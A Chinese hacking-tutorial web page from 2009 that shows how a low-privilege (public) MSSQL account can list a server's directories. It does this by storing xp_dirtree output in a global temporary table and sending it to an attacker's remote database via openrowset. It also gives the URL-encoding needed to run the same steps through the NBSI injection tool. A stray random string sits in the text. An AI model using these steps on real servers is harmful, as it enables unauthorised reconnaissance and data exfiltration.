当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > Public权限下的列目录

黑客技术
JS和C#分别防注入代码
注册验证java代码[针对上篇文章]
识破QQ欺骗网络地址
安全基础知识系列之防范黑客的简单办法
技巧:查明你的PC是否是僵尸计算机
伪装来宾帐户 让黑客找不到漏洞
实现远程破解 伪黑客破译QQ密码全过程
各个网络端口的入侵常用方法
黑客网络攻击的过程和常用的网络攻击工具
服务器溢出提权攻击的解决办法
想学黑客必须具备的一些知识
送给想学习黑客技术的朋友
曾经的辉煌:十大经典破解单兵武器揭密
教你保护你的Wi-Fi网络
QQ缘病毒发作 伪装任务管理器进程
黑客故事:我如何侵入医院电脑
黑客利用安全漏洞发动对电子邮件系统的攻击
黑客通过什么方式入侵网吧
肉鸡的俘虏!一个菜鸟木马黑客的自白
黑客故事 盗取ADSL账号竟如此简单

黑客技术 中的 Public权限下的列目录


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-13   浏览: 59 ::
收藏到网摘: n/a

  提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的,使这些存储过程能利用上,071088b104HaKX8E看下面的代码吧
  --建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
  #-----为本地临时表
  ##----为全局临时表
  create table ##nonamed(
  dir ntext,
  num int
  )
  --调用存储过程把执行回来的数据存到临时表里面
  insert ##nonamed execute master..xp_dirtree 'c:\',1
  --然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
  insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
  select * from ##nonamed
  以上方法,也就是说public可以遍历用户服务器的目录
  在NBSI中,只要把临时表名加前加##就可以了,但要注意URL转码,即写成:%23%23nonamed就OK了!